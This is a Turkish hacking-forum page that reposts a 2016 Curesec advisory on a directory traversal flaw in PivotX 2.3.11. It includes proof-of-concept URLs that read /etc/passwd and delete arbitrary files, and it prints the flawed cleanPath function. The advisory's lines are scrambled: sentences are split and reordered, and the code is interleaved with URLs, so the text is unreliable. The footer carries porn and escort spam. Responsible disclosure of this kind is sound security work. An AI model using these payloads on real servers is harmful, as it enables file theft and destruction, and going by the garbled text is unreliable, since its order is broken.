KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
PivotX 2.3.11 - Directory Traversal (2016)
Konu : PivotX 2.3.11 - Directory Traversal (2016) - 01.04.2016, 13:45
Mesaj: #1
Kod:
Security Advisory - Curesec Research Team

1. Introduction


Fixed in:            not fixed
Affected Product:    PivotX 2.3.11

Vendor Website:      http://pivotx.net/
Fixed Version Link:  n/a

Remote Exploitable:  Yes
Vulnerability Type:  Directory Traversal

Release mode:        Full Disclosure
Reported to vendor:  01/20/2016
Disclosed to public: 03/15/2016

2. Overview
CVE:                 n/a
Credits              Tim Coen of Curesec GmbH



vulnerable to Directory Traversal, allowing authenticated users to read and
PivotX is a CMS for blogging written in PHP. In version 2.3.11, it is
delete files outside of the PivotX directory.

3. Details

Description


bypassed by an attacker, leading to directory traversal in multiple places.
CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

The function cleanPath which is responsible for sanitizing path names can be

Proof of Concept

Admins and Superadmins can read any file:


/.....//...//.....//...//.....//...//.....//...//etc/passwd
http://localhost/pivotx_latest/pivotx/ajaxhelper.php?function=view&basedir=
L3Zhci93d3cvcGl2b3R4X2xhdGVzdC9CYXNlZGlyLwo=&file=../.....//...//.....//.../

Advanced users, Admins and Superadmins can delete any file, possibly leading to
DOS:


    $path = str_replace('../', '', $path);
http://localhost/pivotx_latest/pivotx/index.php?page=media&del=.....//.../
/.....//...//.....//...//.....//...//.....//...//.....//...//important/
important.file&pivotxsession=ovyyn4ob2jc5ym92

Code

lib.php
function cleanPath($path) {
    $path = str_replace('..\\', '', $path);

https://blog.curesec.com/article/blog/PivotX-2311-Directory-Traversal-154.html
    $path = str_replace('..'.DIRECTORY_SEPARATOR, '', $path);
    return $path;
}

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

01/20/2016 Informed Vendor about Issue
01/29/2016 Vendor replies, PivotX is not maintained anymore
03/15/2016 Disclosed to public


Blog Reference:
  
--


blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
Doğruların gözle görülmeyen orduları vardır.

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno